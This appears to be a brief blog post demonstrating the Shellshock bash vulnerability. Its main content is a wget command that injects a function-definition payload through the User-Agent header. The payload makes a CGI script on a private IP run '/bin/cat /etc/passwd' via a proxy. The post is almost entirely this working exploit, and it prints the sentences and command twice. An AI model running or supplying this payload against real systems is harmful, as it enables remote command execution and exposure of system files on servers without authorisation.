Executing Shellshock
One example to test for is to see if you can output system commands.
This example also assumes you are behind a proxy.
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=10.1.1.149:3128 "http://10.1.1.149/cgi-bin/status"
One example to test for is to see if you can output system commands.
This example also assumes you are behind a proxy.
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=10.1.1.149:3128 "http://10.1.1.149/cgi-bin/status"
No comments:
Post a Comment